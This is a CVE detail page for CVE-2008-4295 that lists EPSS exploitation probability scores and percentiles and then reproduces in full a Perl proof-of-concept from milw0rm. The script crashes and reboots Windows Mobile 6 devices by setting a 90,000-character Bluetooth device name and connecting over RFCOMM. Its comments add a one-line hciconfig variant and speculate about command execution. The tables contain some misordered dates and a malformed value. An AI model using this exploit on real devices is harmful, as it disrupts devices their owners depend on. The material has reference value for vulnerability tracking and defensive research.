CVE-2008-4295 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	25.6%	–	–
2022-04-03	–	–	25.6%	–	–
2023-03-12	–	–	–	8.76%	–
2023-04-02	–	–	–	9.79%	–
2023-05-07	–	–	–	11.65%	–
2023-07-16	–	–	–	11.65%	–
2023-07-30	–	–	–	15.01%	–
2023-09-03	–	–	–	37.58%	–
2023-12-24	–	–	–	33.53%	–
2024-01-28	–	–	–	27.88%	–
2024-02-11	–	–	–	27.88%	–
2024-03-03	–	–	–	25.1%	–
2024-04-07	–	–	–	40.55%	–
2024-06-02	–	–	–	39.45%	–
2024-06-23	–	–	–	40.71%	–
2024-07-28	–	–	–	35.36%	–
2024-10-06	–	–	–	30.29%	–
2024-11-10	–	–	–	30.47%	–
2025-03-02	–	–	–	29.06%	–
2025-01-19	–	–	–	30.47%	–
2025-03-09	–	–	–	29.06%	–
2025-03-18	–	–	–	–	46.38%
2025-03-30	–	–	–	–	47.31%
2025-04-15	–	–	–	–	40.75%
2025-04-15	–	–	–	–	40.75,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	96%
2022-04-03	97%
2023-03-12	93%
2023-04-02	94%
2023-05-07	94%
2023-07-16	95%
2023-07-30	95%
2023-09-03	97%
2023-12-24	97%
2024-01-28	96%
2024-02-11	97%
2024-03-03	97%
2024-04-07	97%
2024-06-02	97%
2024-06-23	97%
2024-07-28	97%
2024-10-06	97%
2024-11-10	97%
2025-03-02	97%
2025-01-19	97%
2025-03-09	97%
2025-03-18	97%
2025-03-30	97%
2025-04-15	97%
2025-04-15	97%

#!/usr/bin/perl # # ----------WM6 remote overflow reboot PoC---------- # Simple exploit for remote rebooting a windows mobile device # Maybe we can use it for doing command execution, # I've not test it since the device is rebooting and do not dump a core # for further analysing. # # The bug is not realy in the long string name but when it's the first # time the wm6 device try to get a connection with too long name. # # There's two way to exploit this bug, this PoC show the first method # (direct connect to the device if we know the bdaddr) but you can # just wait for the device to search and overflow by itself when # seeing the hci name: # hciconfig <hci dev> name `perl -e 'print "A"x90000'` # hciconfig <hci dev> piscan # You just have to wait until the wm device search for bluetooth devices # in range and it will be overflowed # # *Tested on WM6 fully patched on [HTC wiza 200],[HTC Mda 8125] # (by Julien Bedard) # use Net::Bluetooth; $target=$ARGV[0]; $hci_dev=$ARGV[1]; $overflow="A" x 90000; $rfcomm_port="3"; if (@ARGV < 2) { die "Usage:\n ./wm6_dos.pl <target_mac> <hci_device>\n\n"; } # change this lame cmd ??? system("hciconfig $hci_dev name $overflow"); $over_conn = Net::Bluetooth->newsocket("RFCOMM"); print "socket error $!\n" unless(defined($over_conn)); $over_conn->connect($target, $rfcomm_port); # milw0rm.com [2008-09-26]